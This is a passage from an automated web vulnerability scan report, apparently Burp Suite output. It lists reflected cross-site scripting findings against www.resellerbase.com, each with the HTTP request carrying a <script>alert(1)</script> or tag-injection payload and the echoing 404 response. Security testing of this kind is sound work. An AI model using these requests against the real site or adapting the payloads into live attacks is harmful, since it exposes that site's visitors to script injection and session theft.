<p>The requested URL /resources-information/themese6f99<script>alert(1)</script>5587d337148/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.4092. http://www.resellerbase.com/resources-information/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d3c64<script>alert(1)</script>eb4f82158bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmosd3c64<script>alert(1)</script>eb4f82158bb/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmosd3c64<script>alert(1)</script>eb4f82158bb/images/ was not found on this server.</p>
...[SNIP]...

2.4093. http://www.resellerbase.com/resources-information/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 21f9f<script>alert(1)</script>fac969a4747 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos/images21f9f<script>alert(1)</script>fac969a4747/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/images21f9f<script>alert(1)</script>fac969a4747/ was not found on this server.</p>
...[SNIP]...

2.4094. http://www.resellerbase.com/resources-information/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload db27a<script>alert(1)</script>70724dfe793 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos/images/?db27a<script>alert(1)</script>70724dfe793=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/images/?db27a<script>alert(1)</script>70724dfe793=1 was not found on this server.</p>
...[SNIP]...

2.4095. http://www.resellerbase.com/resources-information/themes/kosmos/images/folder.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f5123<script>alert(1)</script>d5c3a2d348a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-informationf5123<script>alert(1)</script>d5c3a2d348a/themes/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:52:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-informationf5123<script>alert(1)</script>d5c3a2d348a/themes/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.4096. http://www.resellerbase.com/resources-information/themes/kosmos/images/folder.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec06d<script>alert(1)</script>78f5c1c020c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themesec06d<script>alert(1)</script>78f5c1c020c/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themesec06d<script>alert(1)</script>78f5c1c020c/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.4097. http://www.resellerbase.com/resources-information/themes/kosmos/images/folder.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 790d4<script>alert(1)</script>b6315045e6d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos790d4<script>alert(1)</script>b6315045e6d/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos790d4<script>alert(1)</script>b6315045e6d/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.4098. http://www.resellerbase.com/resources-information/themes/kosmos/images/folder.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9c02c<script>alert(1)</script>971a1d37e1a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos/images9c02c<script>alert(1)</script>971a1d37e1a/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/images9c02c<script>alert(1)</script>971a1d37e1a/folder.gif was not found on this server.</p>
...[SNIP]...

2.4099. http://www.resellerbase.com/resources-information/themes/kosmos/images/folder.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 58482<script>alert(1)</script>865c3ad27e1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos/images/folder.gif58482<script>alert(1)</script>865c3ad27e1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/images/folder.gif58482<script>alert(1)</script>865c3ad27e1 was not found on this server.</p>
...[SNIP]...

2.4100. http://www.resellerbase.com/resources-information/themes/kosmos/images/folder.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/images/folder.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 73fef<script>alert(1)</script>7b4c78f8ed3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos/images/folder.gif?73fef<script>alert(1)</script>7b4c78f8ed3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:52:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/images/folder.gif?73fef<script>alert(1)</script>7b4c78f8ed3=1 was not found on this server.</p>
...[SNIP]...

2.4101. http://www.resellerbase.com/resources-information/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98fff<script>alert(1)</script>10bf9093186 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information98fff<script>alert(1)</script>10bf9093186/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information98fff<script>alert(1)</script>10bf9093186/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4102. http://www.resellerbase.com/resources-information/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f9cdf<script>alert(1)</script>c7e3a3246ad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themesf9cdf<script>alert(1)</script>c7e3a3246ad/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themesf9cdf<script>alert(1)</script>c7e3a3246ad/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4103. http://www.resellerbase.com/resources-information/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 724ea<script>alert(1)</script>84f7647b980 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos724ea<script>alert(1)</script>84f7647b980/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos724ea<script>alert(1)</script>84f7647b980/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4104. http://www.resellerbase.com/resources-information/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cd43a<script>alert(1)</script>d1f061b18bf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos/imagescd43a<script>alert(1)</script>d1f061b18bf/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/imagescd43a<script>alert(1)</script>d1f061b18bf/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4105. http://www.resellerbase.com/resources-information/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ddefa<script>alert(1)</script>447f8e4e48b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos/images/search.phpddefa<script>alert(1)</script>447f8e4e48b?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:54:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/images/search.phpddefa<script>alert(1)</script>447f8e4e48b?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4106. http://www.resellerbase.com/resources-information/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 8eaf8<a>31d7cb5b8cc was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/themes/kosmos/images/search.php?keyword=search...&Submit3=Search8eaf8<a>31d7cb5b8cc&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/images/search.php?keyword=search...&Submit3=Search8eaf8<a>31d7cb5b8cc&opt=2 was not found on this server.</p>
...[SNIP]...

2.4107. http://www.resellerbase.com/resources-information/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload eeaf8<a>f0695a052 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/themes/kosmos/images/search.php?keyword=search...eeaf8<a>f0695a052&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/images/search.php?keyword=search...eeaf8<a>f0695a052&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4108. http://www.resellerbase.com/resources-information/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9007e<script>alert(1)</script>894793f5caf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&9007e<script>alert(1)</script>894793f5caf=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&9007e<script>alert(1)</script>894793f5caf=1 was not found on this server.</p>
...[SNIP]...

2.4109. http://www.resellerbase.com/resources-information/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 6b644<a>93de07554aa was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=26b644<a>93de07554aa HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=26b644<a>93de07554aa was not found on this server.</p>
...[SNIP]...

2.4110. http://www.resellerbase.com/resources-information/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d4697<script>alert(1)</script>e8dd8ceb3ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-informationd4697<script>alert(1)</script>e8dd8ceb3ff/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/
